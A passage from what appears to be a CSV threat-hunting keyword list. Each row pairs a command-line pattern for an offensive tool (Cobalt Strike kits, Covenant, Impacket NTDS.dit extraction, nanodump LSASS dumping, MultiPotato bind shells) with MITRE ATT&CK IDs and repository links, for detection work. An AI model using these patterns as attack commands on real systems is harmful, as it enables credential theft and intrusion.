T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssh-run.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sshv1.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-ccs-injection.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-cert.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-cert-intaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-date.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-dh-params.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-enum-ciphers.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-heartbleed.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-known-key.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* ssl-poodle.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sslv2.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* sslv2-drown.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* SspiUacBypass *,offensive_tool_keyword,SspiUacBypass,Bypassing UAC with SSPI Datagram Contexts,T1548.002,TA0004,N/A,N/A,Defense Evasion,https://github.com/antonioCoco/SspiUacBypass,1,0,N/A,10,2,167,27,2023-09-24T17:33:25Z,2023-09-14T20:59:22Z -* sstp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* st client wss://*,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -* st teamserver *,offensive_tool_keyword,silenttrinity,SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.,T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018,TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ,N/A,N/A,POST Exploitation tools,https://github.com/byt3bl33d3r/SILENTTRINITY,1,0,N/A,N/A,10,2070,413,2023-07-08T19:10:18Z,2018-09-25T15:17:30Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -process64 *.exe -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Inject -unhook -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* -stageless -Ix64 *.bin -Ix86 *.bin -P Local -unhook -O *.js*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -* start covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -* start_campaign.py*,offensive_tool_keyword,Ninja,Open source C2 server created for stealth red team operations,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/ahmedkhlief/Ninja,1,0,N/A,10,10,720,166,2022-09-26T16:07:43Z,2020-03-04T14:17:22Z -* start_hidden_process*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,0,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -* StayKit.cna*,offensive_tool_keyword,cobaltstrike,Cobalt Strike kit for Persistence,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/0xthirteen/StayKit,1,0,N/A,10,10,448,81,2020-01-27T14:53:31Z,2020-01-24T22:20:20Z -* steal_token /process:* /command:*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -* stop covenant*,offensive_tool_keyword,covenant,Covenant is a collaborative .NET C2 framework for red teamers,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/cobbr/Covenant,1,0,N/A,10,10,3787,732,2023-02-21T23:55:48Z,2019-02-07T15:55:18Z -* striker.py*,offensive_tool_keyword,cobaltstrike,This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Cobalt-Strike/sleep_python_bridge,1,0,N/A,10,10,158,33,2023-04-12T15:00:48Z,2021-10-12T18:18:48Z -* stun-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* stun-version.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* stuxnet-detect.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* supermicro-ipmi-conf.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* Supershell.tar.gz*,offensive_tool_keyword,supershell,Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload,T1090 - T1059 - T1021,TA0011 - TA0005 - TA0002,N/A,N/A,C2,https://github.com/tdragon6/Supershell,1,0,N/A,10,10,837,111,2023-09-26T13:53:55Z,2023-03-25T15:02:43Z -* -sV --script vulners *,offensive_tool_keyword,nmap,Nmap (Network Mapper) is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Network Exploitation tools,https://nmap.org/book/nse-usage.html,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* svn-brute.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -* SW2_HashSyscall*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -* SweetPotato by @_EthicalChaos*,offensive_tool_keyword,cobaltstrike,Modified SweetPotato to work with CobaltStrike v4.0,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Tycx2ry/SweetPotato_CS,1,0,N/A,10,10,236,49,2020-04-30T14:27:20Z,2020-04-16T08:01:31Z -* --syscalls GetSyscallStub*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -syscalls -sleep=*.exe*,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -* --syscalls SysWhispers3*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* -system SYSTEM -ntds NTDS.dit LOCAL*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* -system SYSTEM -ntds NTDS.dit -outputfile*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -* --syswhispers --jump*,offensive_tool_keyword,CSExec,An alternative to *exec.py from impacket with some builtin tricks,T1059.001 - T1059.005 - T1071.001,TA0002,N/A,N/A,Lateral Movement,https://github.com/Metro-Holografix/CSExec.py,1,0,private github repo,10,,N/A,,, -* SysWhispers*,offensive_tool_keyword,cobaltstrike,Tool for working with Direct System Calls in Cobalt Strike's Beacon Object Files (BOF),T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/outflanknl/InlineWhispers,1,0,N/A,10,10,286,42,2021-11-09T15:39:27Z,2020-12-25T16:52:50Z -* -t *https://autodiscover.*/autodiscover/autodiscover.xml*autodiscover*,offensive_tool_keyword,adfspray,Python3 tool to perform password spraying against Microsoft Online service using various methods,T1110.003,TA0006,N/A,N/A,Credential Access,https://github.com/xFreed0m/ADFSpray,1,0,N/A,N/A,1,75,14,2023-03-12T00:21:34Z,2020-04-23T08:56:51Z -* -t 127.0.0.1 -p 1337 *,offensive_tool_keyword,bropper,An automatic Blind ROP exploitation tool ,T1068 - T1059.003 - T1140,TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/Hakumarachi/Bropper,1,0,N/A,7,2,175,18,2023-06-09T12:40:05Z,2023-01-20T14:09:19Z -* -t BindShell -p *pwned\pipe\spoolss*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -* -t C2concealer *,offensive_tool_keyword,C2concealer,C2concealer is a command line tool that generates randomized C2 malleable profiles for use in Cobalt Strike.,T1090 - T1090.003 - T1027 - T1027.005 - T1071 - T1071.001,TA0042 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RedSiege/C2concealer,1,0,N/A,10,10,850,162,2021-09-26T16:37:06Z,2020-03-23T14:13:16Z -* -t CreateProcessAsUserW -p *pwned\pipe\spoolss* -e *.exe*,offensive_tool_keyword,MultiPotato,get SYSTEM via SeImpersonate privileges,T1548.002 - T1134.002,TA0004 - TA0006,N/A,N/A,Privilege Escalation,https://github.com/S3cur3Th1sSh1t/MultiPotato,1,0,N/A,10,5,485,87,2021-11-20T16:20:23Z,2021-11-19T15:50:55Z -* -t dcsync://* -*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -* -t donut *,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* -t pe2sh*,offensive_tool_keyword,inceptor,Template-Driven AV/EDR Evasion Framework,T1562.001 - T1059.003 - T1027.002 - T1070.004,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://github.com/klezVirus/inceptor,1,0,N/A,N/A,10,1356,243,2023-07-25T15:28:56Z,2021-08-02T15:35:57Z -* -t schtaskbackdoor *,offensive_tool_keyword,SharPersist,SharPersist Windows persistence toolkit written in C#.,T1547 - T1053 - T1027 - T1028 - T1112,TA0003 - TA0008,N/A,N/A,Persistence,https://github.com/fireeye/SharPersist,1,0,N/A,10,10,1150,233,2023-08-11T00:52:09Z,2019-06-21T13:32:14Z -* -Target * -AllDomain *,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,N/A,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z 